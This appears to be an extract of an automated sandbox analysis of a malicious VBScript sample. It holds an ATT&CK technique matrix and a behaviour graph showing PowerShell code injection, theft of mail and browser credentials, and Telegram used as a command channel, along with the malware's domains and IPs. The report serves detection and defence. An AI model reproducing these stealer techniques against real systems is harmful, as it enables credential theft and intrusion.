              Email Collection              		21
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook11
              Masquerading              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture4
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Modify Registry              		LSA Secrets31
              Virtualization/Sandbox Evasion              		SSHKeylogging15
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
              Process Injection              		DCSync1
              System Network Configuration Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1636427 Sample: 4500149631.vbe Startdate: 12/03/2025 Architecture: WINDOWS Score: 100 43 reallyfreegeoip.org 2->43 45 api.telegram.org 2->45 47 3 other IPs or domains 2->47 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 67 9 other signatures 2->67 9 powershell.exe 18 2->9         started        12 wscript.exe 1 2->12         started        14 svchost.exe 1 1 2->14         started        signatures3 63 Tries to detect the country of the analysis system (by using the IP) 43->63 65 Uses the Telegram API (likely for C&C communication) 45->65 process4 dnsIp5 69 Early bird code injection technique detected 9->69 71 Writes to foreign memory regions 9->71 73 Found suspicious powershell code related to unpacking or dynamic code loading 9->73 75 Queues an APC in another process (thread injection) 9->75 17 msiexec.exe 17 9 9->17         started        21 conhost.exe 9->21         started        77 Suspicious powershell command line found 12->77 79 Wscript starts Powershell (via cmd or directly) 12->79 81 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->81 83 2 other signatures 12->83 23 powershell.exe 14 18 12->23         started        25 WmiPrvSE.exe 12->25         started        49 127.0.0.1 unknown unknown 14->49 signatures6 process7 dnsIp8 35 api.telegram.org 149.154.167.220, 443, 49712, 49713 TELEGRAMRU United Kingdom 17->35 37 checkip.dyndns.com 158.101.44.242, 49695, 49698, 49700 ORACLE-BMC-31898US United States 17->37 39 reallyfreegeoip.org 104.21.80.1, 443, 49696, 49697 CLOUDFLARENETUS United States 17->39 51 Tries to steal Mail credentials (via file / registry access) 17->51 53 Tries to harvest and steal browser information (history, passwords, etc) 17->53 27 cmd.exe 1 17->27         started        41 ooriginalused.com 185.159.153.17, 443, 49682, 49694 SERVERPARSIR Iran (ISLAMIC Republic Of) 23->41 55 Found suspicious powershell code related to unpacking or dynamic code loading 23->55 29 conhost.exe 23->29         started        signatures9 process10 process11 31 conhost.exe 27->31         started        33 reg.exe 1 1 27->33         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.